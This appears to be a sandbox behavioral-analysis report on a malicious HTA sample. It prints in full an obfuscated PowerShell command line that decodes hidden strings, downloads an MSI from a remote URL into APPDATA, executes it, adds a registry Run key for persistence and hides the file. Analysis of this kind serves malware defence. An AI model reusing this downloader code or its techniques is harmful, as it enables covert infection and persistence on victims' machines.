
Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\es.hta

    1460
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa 
$iEiUK;;;;}paTeG;

      2092

Process contents
